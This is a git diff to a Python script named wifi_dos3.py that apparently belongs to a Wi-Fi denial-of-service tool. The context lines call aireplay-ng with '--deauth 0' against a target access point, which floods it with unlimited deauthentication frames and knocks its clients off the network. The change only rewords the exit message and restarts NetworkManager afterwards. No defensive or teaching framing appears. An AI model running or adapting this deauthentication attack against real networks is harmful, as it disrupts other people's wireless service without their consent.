diff --git a/wifi_dos3.py b/wifi_dos3.py index e1ce977..c69f508 100644 --- a/wifi_dos3.py +++ b/wifi_dos3.py @@ -196,5 +196,9 @@ def check_for_essid(essid, lst): try: subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, hacknic]) except KeyboardInterrupt: - print("Done!") -# User will need to use control-c to break the script. + print("Stop authentication requests and end the monitor mode.") + +# Restart the network service. +subprocess.run(["sudo", "systemctl", "start", "NetworkManager.service"]) + +print("Done!")